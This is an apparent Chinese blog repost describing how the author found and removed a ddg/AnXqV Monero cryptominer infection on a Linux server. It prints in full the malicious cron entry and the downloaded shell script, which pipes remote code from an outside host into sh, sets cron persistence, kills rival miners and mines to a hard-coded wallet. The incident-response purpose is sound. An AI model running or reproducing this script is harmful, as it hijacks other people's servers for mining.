htop 发现导常:

接着发现可疑进程:

首先检测crontab,发现问题:

# crontab -l
*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh

注释掉计划任务!!!

# crontab -l
#*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh

把把脚本下载下来:

http://www.bdyutiudwj.com/i.sh?1

查看一下内容:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh" > /var/spool/cron/crontabs/rootif [ ! -f "/tmp/ddg.223" ]; thencurl -fsSL http://www.bdyutiudwj.com/ddg.$(uname -m) -o /tmp/ddg.223
fi
chmod +x /tmp/ddg.223 && /tmp/ddg.223CleanTail()
{ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}DoYam()
{if [ ! -f "/tmp/AnXqV.yam" ]; thencurl -fsSL http://www.bdyutiudwj.com/yam -o /tmp/AnXqV.yam
    fichmod +x /tmp/AnXqV.yam/tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr
}DoMiner()
{if [ ! -f "/tmp/AnXqV" ]; thencurl -fsSL http://www.bdyutiudwj.com/minerd -o /tmp/AnXqV
    fichmod +x /tmp/AnXqV/tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
}DoMinerNoAes()
{if [ ! -f "/tmp/AnXqV.noaes" ]; thencurl -fsSL http://www.bdyutiudwj.com/minerd.noaes -o /tmp/AnXqV.noaes
    fichmod +x /tmp/AnXqV.noaes/tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
}ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "AnXqV" || DoMiner
ps auxf|grep -v grep|grep "AnXqV" || DoYam
ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes

# tree /var/spool/cron/
/var/spool/cron/
├── crontabs
│   └── root
└── root
#查看内容并注掉
cat /var/spool/cron/root /var/spool/cron/crontabs/root
#*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh
#*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh

最后杀掉可疑进程,问题解决

转载于:https://www.cnblogs.com/bass6/p/6487253.html

查杀病毒实战----------------》ddg.223 and AnXQV相关推荐

  1. 毒霸07.11.19.18版本 新增加922个查杀病毒

    毒霸病毒信息库07.11.19.18版本新增可查杀病毒数922,其中:木马黑客蠕虫病毒数:731; 风险病毒数:170 其他病毒数:21. 1. JS.Exploitbd.tv 2. VBS.Expl ...

  2. linux检测病毒工具,Linux下查杀病毒工具

    top: 0px; margin-bottom: 16px; color: rgb(44, 44, 44); line-height: 28px; text-align: justify; word- ...

  3. 怎么用计算机杀毒,电脑怎样查杀病毒

    病毒往往会利用计算机操作系统的弱点进行传播,那么大家知道电脑怎样查杀病毒吗?接下来大家跟着学习啦小编一起来了解一下电脑查杀病毒的解决方法吧. 电脑查杀病毒方法一 一.使用杀毒软件进行杀毒 1.首先进入 ...

  4. 计算机病毒手动查杀,电脑中毒了怎么办 如何手动彻底查杀病毒【解决方法】...

    电脑中毒了怎么办? 我们有时使用电脑会发现电脑经常无缘无故死机,或许这是某个部件出了故障,也或许是电脑中毒了. 现在有很多杀毒软件都可以帮助电脑杀毒,但这只是一些比较基本的,要是遇到厉害一点的病毒,杀 ...

  5. 你会查杀病毒吗?反病毒技巧! 比较长。

    现在拥有电脑的朋友们,很多没有经历过DOS时代(绝非以老卖老),仅仅是在图形桌面和鼠标点击下成长的,所以对于引导区.病毒的传染.复制方面不是很了解,有的甚至跟本就不了解.甚至是谈"毒&quo ...

  6. 杀毒软件的查杀病毒的原理以及木马、病毒的免杀伎俩(论杀或者不杀 )

    杀毒软件的查杀病毒的原理以及木马.病毒的免杀伎俩(论杀或者不杀 ) 无意中在网上看到的,描述通俗易懂,基本全是基础知识,权当了解吧. ================================= ...

  7. 使用Mcafee命令行快速查杀病毒

    概述 1.下载Mcafee最新病毒库文件如sdat5035.exe: 2.执行sdat5035.exe /e命令解压: 3.在解压缩后的目录中执行scan /ad命令和参数执行全盘杀毒. 今天和技术部 ...

  8. 手工查杀病毒常见文件型分析总结

    很久没写点自己的东西了,今天更新点这么久来积累的一点关于病毒查杀方面的东西,希望对大家日后遇到常见病毒,各种顽固病毒都能有应对的策略. 希望我的这些经验能对大家以后查杀病毒有所帮助,不足之处请高手指点 ...

  9. Windows电脑清理垃圾与查杀病毒方法

    清理垃圾方法(第一种): 第一步,按住Windows徽标键和R键打开运行框: 第二步,输入"%temp%"(双引号不要输入): 第三步,按回车键或者点确定: 第四步,按住Ctrl和 ...

  10. Linux下查杀病毒

    1.对虚拟机执行快照(或者备份重要文件) 2.下载杀毒软件 wget http://pkgs.repoforge.org/clamav/clamav-0.98-2.el5.rf.x86_64.rpm ...

最新文章

  1. 非常好用的Python图像增强工具,适用多个框架
  2. 有关增强现实技术的过去、现在和未来的发展
  3. excel 如何快速实现绝对引用
  4. java基础---serializable的作用
  5. vue开发(1) 软件安装
  6. jsr303jsp页面怎么显示错误信息_jsp校验信息不显示
  7. wpf mysql存储过程_MySQL存储过程的创建及调用
  8. 在线分流框架下的AB Test
  9. [SinGuLaRiTy] NOIP2017 提高组
  10. 【数据集】Python爬取某国内所有航班记录
  11. Ubuntu20.04下opencv的安装
  12. php图片反色特效,PHP实现对图片的反色处理功能【测试可用】
  13. QCC3040---coredump方法和注意事项
  14. 以太网交换机和路由器的区别(转载)
  15. 设置 IDEA走easyconnect代理
  16. 博客项目(一):API说明文档、用户模块、短信模块、支付模块
  17. RedisUtils工具类,设置缓存,然后需要在删除,更新插入的时候清空缓存,保持redis和mysql的数据一致
  18. 35岁以上高龄程序员,即将被裁员,该何去何从?
  19. 超级计算机多层网络,超级计算机的多层架构抽象及描述
  20. 你知道APP扫码登陆的实现原理吗?

热门文章

  1. JAVA实现汉字转换为拼音 自动识别常用多音字 JPinyin
  2. kubernetes(centos7)域名解析失败
  3. CentOS域名解析失败
  4. 货币转换python代码_在Python中创建货币转换器
  5. 鼠鼠百科——普适计算
  6. HFSS同轴馈电矩形贴片天线馈电点以及尺寸的计算
  7. 维度灾难--通过Python理解高维空间欧氏距离与余弦相似度失效
  8. Autovue v21.0.2新功能简介
  9. 有一个多项式:Pn(x)=a0x+a1x+….+anx(n=10),它们的系数存放在一个一维数组中,编写程序,输入系数和x的值,计算并输出Pn(x)的结果。
  10. 淘宝直通车新功能智能推广 智能推广计划设置 智能推广优化 智能推广优化原则